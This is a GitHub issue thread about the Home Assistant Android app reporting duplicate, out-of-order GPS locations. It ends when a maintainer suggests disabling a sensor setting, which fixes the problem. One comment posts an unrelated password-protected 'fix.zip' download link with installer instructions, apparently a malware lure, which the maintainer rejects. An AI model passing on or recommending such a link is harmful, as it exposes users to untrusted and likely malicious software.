### ISSUE TITLE
GPS location data reporting twice within a second out of order

### ISSUE THREAD

**Issue by contactcr** [home-assistant/android#4595]
**Home Assistant Android app version(s):**  2024.8.1-full

**Android version(s):**  14

**Device model(s):**  Galaxy S24

**Home Assistant version:**  2024.8.3

**Last working Home Assistant release (if known):**

**Description of problem, include YAML if issue is related to notifications:**  I have a map entity that tracks my location from what the companion app is reporting.  Occasionally it will "double" report it seems where location will be the same or nearly the same timestamp but two different locations.  It's often in the wrong order when it does this also so it shows a "Z" on the map.  The other points were between 40 and 60 seconds apart

**Companion App Logs:**

```

```

**Screenshot or video of problem:**  
![HA app location](https://github.com/user-attachments/assets/f71f8635-b879-4dee-bdcb-87b586a94eda)

**Additional information:**  

Background Location:  Enabled
  - high accuracy mode:  disabled
  - min accuracy:  200
  - location sent:  exact
High accuracy mode:  Enabled
High accuracy Update Interval:  Disabled
Location Zone:  Enabled
  - min acc:  200
Single Accurate Location:  Enabled
  - include in sensor update:  enabled
  - min accuracy:  200
  - min time btwn up:  60000

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dshokouhi** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

please attach the logs as normal, we will not be downloading nor installign anything to view logs

**Comment by dshokouhi** [comment]
@contactcr please attach the logs from teh device, also we cannot control the rate of updates received from Google and will send them to the server if they are valid location reports. Please also check location tracking history under teh  troubleshooting section as  that will also show the order things were received in. Our logs will indicate the report evaluation to see  what happened.

**Comment by contactcr** [comment]
The logs only show the last 15 minutes (using 2500 lines!) and I haven't been driving.  I can post some fresh logs when I drive next unless you think the current ones are still relevant.

 The location tracking did still have that timeframe:

![location tracking](https://github.com/user-attachments/assets/9c18963a-80cb-4f5d-a9f7-a462bfba9eaa)

**Comment by dshokouhi** [comment]
> The logs only show the last 15 minutes (using 2500 lines!)

location tracking history goes back 48 hours

your logs look normal, if something came out of order there is not much we can do as those reports come from Google and no one else. We do some evaluation to make sure its a recent location update

we do indeed evaluate the actual timestamp things came in compared to when we last sent them to the server

https://github.com/home-assistant/android/blob/master/app/src/full/java/io/homeassistant/companion/android/sensors/LocationSensorManager.kt#L887

please try turning off "Include in sensor update" under single accurate location sensor, that is known to cause odd conflicts like this. That setting is not necessary and is old location tracking behavior that some custom ROM users find helpeful.

**Comment by contactcr** [comment]
> please try turning off "Include in sensor update" under single accurate location sensor, that is known to cause odd conflicts like this. That setting is not necessary and is old location tracking behavior that some custom ROM users find helpeful.

Turning off that option seemed to have worked.  Thank you.
